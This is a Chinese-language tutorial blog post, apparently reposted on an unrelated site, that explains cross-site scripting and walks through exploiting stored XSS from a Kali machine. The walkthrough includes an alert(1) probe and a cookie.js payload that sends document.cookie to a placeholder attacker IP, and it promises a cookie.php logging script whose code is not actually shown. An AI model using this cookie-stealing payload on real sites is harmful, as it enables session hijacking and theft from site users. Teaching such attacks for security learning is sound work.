XSS详解及其利用方式 |
您所在的位置:网站首页 › xss 漏洞利用 › XSS详解及其利用方式 |
XSS-xss
XSS是什么??? XSS(跨站脚本攻击)通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
不知道各位小伙伴对于文字描述的概念能不能看的懂,偷偷告诉你们:“反正我是看不太懂😂”,本次我们主要对存储型xss进行学习和利用,想了解xss其他类型的小伙伴也可以参考一下以下博主的文章,写的也是特别详细!(拓展:反射型详解,DOM型详解) 存储型XSS 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行;这种XSS比较危险,容易造成蠕虫,盗窃cookie等; 第一步:判断是否存在xss漏洞,发现有个搜索可以利用一下; 利用alert(1)看是否会弹窗进行判断;第二步:思考一个问题,虽然可以拿到cookie值,但是怎么样才能把每一次获取到的cookie值保存起来呢?; 打开终端,开启apache2,并进入/var/www/html目录; root@kali:~# service apache2 start root@kali:~# cd /var/www/html root@kali:/var/www/html# 创建cookie.php(注:用于将获取到的cookie存在xss.txt文件中); 代码如下:再创建cookie.js(注:用于获取cookie值); 代码如下: var img = document.createElement('img'); img.width = 0; img.height = 0; img.src = 'http://攻击者ip/cookie.php?c='+document.cookie;第三步:在留言处插入获取cook值的代码; 注:通过ip将获取到的cookie值保存在xss.txt里;以上就是存储型xss利用的基本操作,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,记得走之前别忘了点个赞哟😁! |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |